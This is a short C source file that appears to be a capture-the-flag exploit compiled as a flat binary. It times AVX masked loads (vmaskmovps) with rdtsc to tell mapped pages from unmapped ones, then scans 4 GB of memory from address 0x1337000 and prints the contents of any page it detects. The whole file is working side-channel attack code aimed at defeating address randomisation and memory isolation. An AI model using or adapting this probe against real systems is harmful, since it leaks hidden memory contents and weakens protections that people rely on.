/
main.c
75 lines (69 loc) · 1.75 KB
/
main.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
typedef unsigned long long u64;
void putchar (char ch) {
asm volatile(
".intel_syntax noprefix\n"
"mov eax, 1\n"
"mov edi, 1\n"
"mov rsi, %[buf]\n"
"mov rdx, 1\n"
"syscall\n"
".att_syntax prefix\n"
:: [buf] "r" (&ch)
: "rax", "rdi", "rsi", "rdx", "rcx", "r11"
);
}
void puts (char * s) {
while (*s != 0) {
putchar(*s);
s++;
}
putchar('\n');
}
void exit(int code) {
asm volatile(
"mov $60, %%eax\n"
"syscall\n"
:: [code] "rdi" (code)
);
}
int probe(void * addr) {
u64 tic_hi, tic_lo, toc_hi, toc_lo;
asm volatile(
".intel_syntax noprefix\n"
"vpxor ymm0, ymm0, ymm0\n"
"vmaskmovps ymm0, ymm0, ymmword ptr [%[ptr]]\n"
"mfence\n"
"rdtsc\n"
"mov %[hi], rdx\n"
"mov %[lo], rax\n"
"mfence\n"
"vmaskmovps ymm0, ymm0, ymmword ptr [%[ptr]]\n"
"mfence\n"
"rdtsc\n"
"mov %[thi], rdx\n"
"mov %[tlo], rax\n"
".att_syntax prefix\n"
: [hi] "=r" (tic_hi),
[lo] "=r" (tic_lo),
[thi] "=r" (toc_hi),
[tlo] "=r" (toc_lo)
: [ptr] "r" (addr)
: "ymm0", "rdx", "rax"
);
return ((toc_hi << 32) + toc_lo) - ((tic_hi << 32) + tic_lo);
}
// we put the main function into the `.entry` section
// and use custom linker script in order to guarantee
// main is run first in the flat binary
void __attribute__((section(".entry"))) main () {
u64 base = 0x1337000;
while (base < 0x1337000 + 0x100000000) {
int access = probe(base);
if (access < 140) {
puts("FOUND");
puts((char *)base);
putchar('\n');
}
base += 0x1000;
}
}